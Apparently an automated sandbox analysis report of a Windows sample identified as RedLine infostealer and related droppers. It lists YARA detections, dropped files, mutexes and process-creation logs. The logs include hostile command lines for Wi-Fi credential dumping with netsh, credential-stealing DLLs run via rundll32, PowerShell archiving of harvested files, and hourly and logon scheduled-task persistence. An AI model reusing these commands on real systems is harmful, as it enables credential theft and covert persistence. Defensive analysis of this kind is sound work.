Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: String function: 00B99750 appears 122 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 00719750 appears 244 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 0071F620 appears 36 times
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 2132
Uses 32bit PE files
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: Section: ZLIB complexity 0.9975808478552279
Source: explorha.exe.0.dr Static PE information: Section: ZLIB complexity 0.9975808478552279
Source: amert[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9977240444214877
Source: amert[1].exe.6.dr Static PE information: Section: fbupybke ZLIB complexity 0.9944582206191764
Source: amert.exe.6.dr Static PE information: Section: ZLIB complexity 0.9977240444214877
Source: amert.exe.6.dr Static PE information: Section: fbupybke ZLIB complexity 0.9944582206191764
Source: random[1].exe0.6.dr Static PE information: Section: ZLIB complexity 0.9915700285291631
Source: c884f8452a.exe.6.dr Static PE information: Section: ZLIB complexity 0.9915700285291631
Source: sarra[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9915469146238377
Source: chrosha.exe.14.dr Static PE information: Section: ZLIB complexity 0.9977240444214877
Source: chrosha.exe.14.dr Static PE information: Section: fbupybke ZLIB complexity 0.9944582206191764
Source: RageMP131.exe.20.dr Static PE information: Section: ZLIB complexity 0.9915700285291631
Source: MPGPH131.exe.20.dr Static PE information: Section: ZLIB complexity 0.9915700285291631
Source: amert.exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: chrosha.exe.14.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: amert[1].exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@106/196@19/15
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\SyncRootManager
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2232:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:64:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2324:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Mutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5596
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4012
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5516:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3436
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File created: C:\Users\user\AppData\Local\Temp\09fd851a4f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: c884f8452a.exe, 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: c884f8452a.exe, 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: rundll32.exe, 00000008.00000002.2871819933.000001E17AE8F000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2978212493.0000000007F0A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3053135954.0000000007CC2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029531974.0000000007CAC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3026186524.0000000007CAC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3035311559.00000000079E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Virustotal: Detection: 54%
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe ReversingLabs: Detection: 50%
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: amert.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe "C:\Users\user\AppData\Local\Temp\1000054001\amert.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5540 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1636,i,5624198576768077496,445941079671464976,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 2132
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 2052
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 1948
Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1984,i,457568203381776828,11237095852378400144,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe "C:\Users\user\AppData\Local\Temp\1000187001\build12.exe"
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process created: C:\Windows\System32\conhost.exe
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe "C:\Users\user\AppData\Local\Temp\1000054001\amert.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5540 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
